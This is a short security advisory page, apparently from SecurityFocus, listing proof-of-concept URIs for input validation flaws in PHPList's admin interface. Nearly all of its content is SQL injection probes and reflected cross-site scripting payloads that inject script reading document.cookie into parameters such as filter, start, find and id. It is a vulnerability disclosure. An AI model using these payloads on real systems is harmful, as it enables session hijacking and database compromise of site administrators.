Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPList Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/lists/admin/?page=admin&id=1'[SQL]
http://www.example.com/lists/admin/?page=editattributes&id=1'[SQL]

http://www.example.com/lists/admin/?page=eventlog&s=0&filter="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start=&delete="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=configure&id="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=users&find="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=admin&start="><script>alert(document.cookie)</script>







 

Privacy Statement
Copyright 2009, SecurityFocus